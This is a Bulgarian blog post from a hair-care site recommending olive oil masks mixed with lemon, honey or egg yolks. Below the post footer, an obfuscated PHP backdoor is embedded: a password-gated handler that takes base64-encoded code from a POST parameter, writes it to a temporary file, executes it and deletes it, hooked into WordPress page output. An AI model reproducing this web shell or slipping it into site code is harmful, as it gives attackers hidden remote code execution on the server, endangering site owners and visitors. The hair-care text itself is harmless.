Зехтин за здрава и красива коса! | Косопад

Зехтин за здрава и красива коса!

Здравата коса изисква грижи

Здравата коса изисква грижи

С колкото и нови продукти да ни изкушава съвременната козметична индустрия, някои домашни цярове заслужено си остават актуални със своите изумителни и зашеметяващи свойства и качества, и в днешни дни. Причината затова се крие във фактът, че натуралните продукти са на достъпни цени, естествени и много ефективни. Едно от най-популярните и широко използвани средства за разкрасяване заслужено си остава зехтинът.

зехтин

зехтин

Неговите свойства и качества не могат да бъдат сравнявани с нито един химикал или модерен козметичен продукт. Зехтинът е много богат на витамини и куп полезни вещества, които имат свойството да подхранват косата ви из основи и мигновено да я правят здрава и сияйна. Качествата на зехтина са били познати още в Древна Елада, когато той е бил използван за по-бърз растеж на косата. Още по това време гъркините са се възползвали от зехтина, като го смесвали със сок от лимон Тогава той бил пропорция 2 към 1. За да се възползвате от тази чудодейна смес обаче трябва първо да я оставите предстои за два часа. Зехтинът е много ефикасен и срещу цъфтящи краища, за да се отървете от неприятното накъсване на косата трябва да смесите 3 супени лъжици зехтин с 2 супени лъжици мед.Получената смес нанесете равномерно по дължината на цялата си коса и престоявате с нея 20 – 30 минути, след което я изплаквате обилно с предпочитания от вас шампоан.За блестяща и сияйна коса използвайте 5 супени лъжици зехтин с 2 разбити жълтъка, за да има ефект и с тази маска трябва да престоите поне 30 минути.

27. март 2014 13:42:46 от Косопад
Категории: Любопитно за косопада | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}